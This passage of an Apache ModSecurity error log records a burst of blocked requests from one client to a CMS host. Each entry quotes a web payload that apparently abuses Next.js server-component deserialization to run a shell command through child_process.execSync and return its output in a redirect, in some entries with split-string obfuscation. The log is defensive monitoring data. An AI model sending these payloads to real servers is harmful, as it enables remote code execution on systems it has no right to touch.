"(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _olvm=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _ftco=Buffer.from(_olvm).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ftco};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aY16Wo_MCZZFujL22Y6oKwAAAM8"] [Thu Feb 12 08:59:38.285159 2026] [:error] [pid 13989:tid 14007] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _mwxc=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _fouz=Buffer.from(_mwxc).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_fouz};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aY16Wo_MCZZFujL22Y6oLAAAANA"] [Thu Feb 12 08:59:38.327325 2026] [:error] [pid 13989:tid 14005] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _fxhd=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _bfta=Buffer.from(_fxhd).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_bfta};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aY16Wo_MCZZFujL22Y6oLQAAAM4"] [Thu Feb 12 08:59:38.372843 2026] [:error] [pid 13989:tid 13991] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _biyu=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _jfwn=Buffer.from(_biyu).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_jfwn};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aY16Wo_MCZZFujL22Y6oLgAAAMA"] [Thu Feb 12 08:59:38.418405 2026] [:error] [pid 13989:tid 13998] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _wlss=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _mppp=Buffer.from(_wlss).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_mppp};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aY16Wo_MCZZFujL22Y6oLwAAAMc"] [Thu Feb 12 08:59:38.461707 2026] [:error] [pid 13989:tid 14015] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _uuny=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _sdbt=Buffer.from(_uuny).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_sdbt};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aY16Wo_MCZZFujL22Y6oMAAAANg"] [Thu Feb 12 08:59:38.504626 2026] [:error] [pid 13989:tid 13992] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _iogu=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _arrr=Buffer.from(_iogu).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_arrr};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aY16Wo_MCZZFujL22Y6oMQAAAME"] [Thu Feb 12 08:59:38.547352 2026] [:error] [pid 13989:tid 14010] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _qzlv=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _bkhn=Buffer.from(_qzlv).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_bkhn};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aY16Wo_MCZZFujL22Y6oMgAAANM"] [Thu Feb 12 08:59:38.595470 2026] [:error] [pid 13989:tid 14013] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _xtwn=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _xrbv=Buffer.from(_xtwn).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_xrbv};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aY16Wo_MCZZFujL22Y6oMwAAANY"] [Thu Feb 12 08:59:38.639114 2026] [:error] [pid 13989:tid 13995] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _xmpo=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _qmnz=Buffer.from(_xmpo).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_qmnz};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aY16Wo_MCZZFujL22Y6oNAAAAMQ"] [Thu Feb 12 08:59:38.682416 2026] [:error] [pid 13989:tid 13997] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _wejo=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _dciu=Buffer.from(_wejo).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_dciu};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aY16Wo_MCZZFujL22Y6oNQAAAMY"] [Thu Feb 12 08:59:38.735013 2026] [:error] [pid 13989:tid 14011] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _dfwa=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _hnlp=Buffer.from(_dfwa).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_hnlp};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aY16Wo_MCZZFujL22Y6oNgAAANQ"] [Thu Feb 12 08:59:38.778741 2026] [:error] [pid 13989:tid 13996] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _ogxf=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _dtvn=Buffer.from(_ogxf).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_dtvn};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aY16Wo_MCZZFujL22Y6oNwAAAMU"] [Thu Feb 12 08:59:38.821925 2026] [:error] [pid 13989:tid 14012] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _dkmi=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _lamp=Buffer.from(_dkmi).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_lamp};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aY16Wo_MCZZFujL22Y6oOAAAANU"] [Thu Feb 12 08:59:38.864958 2026] [:error] [pid 13989:tid 13999] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _plrq=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _jkqy=Buffer.from(_plrq).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_jkqy};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aY16Wo_MCZZFujL22Y6oOQAAAMg"] [Thu Feb 12 08:59:38.908084 2026] [:error] [pid 13989:tid 14008] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _ybps=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _yntx=Buffer.from(_ybps).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_yntx};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aY16Wo_MCZZFujL22Y6oOgAAANE"] [Thu Feb 12 08:59:38.950637 2026] [:error] [pid 13989:tid 14001] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _orcg=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _erqe=Buffer.from(_orcg).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_erqe};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aY16Wo_MCZZFujL22Y6oOwAAAMo"] [Thu Feb 12 08:59:38.990344 2026] [:error] [pid 13989:tid 13993] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _dful=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _rgfy=Buffer.from(_dful).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_rgfy};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aY16Wo_MCZZFujL22Y6oPAAAAMI"] [Thu Feb 12 08:59:39.033087 2026] [:error] [pid 13989:tid 14000] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _lopr=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _ajam=Buffer.from(_lopr).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ajam};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aY16W4_MCZZFujL22Y6oPQAAAMk"] [Thu Feb 12 08:59:39.075996 2026] [:error] [pid 13989:tid 14009] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _zdgc=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _loov=Buffer.from(_zdgc).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_loov};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aY16W4_MCZZFujL22Y6oPgAAANI"] [Thu Feb 12 08:59:39.118462 2026] [:error] 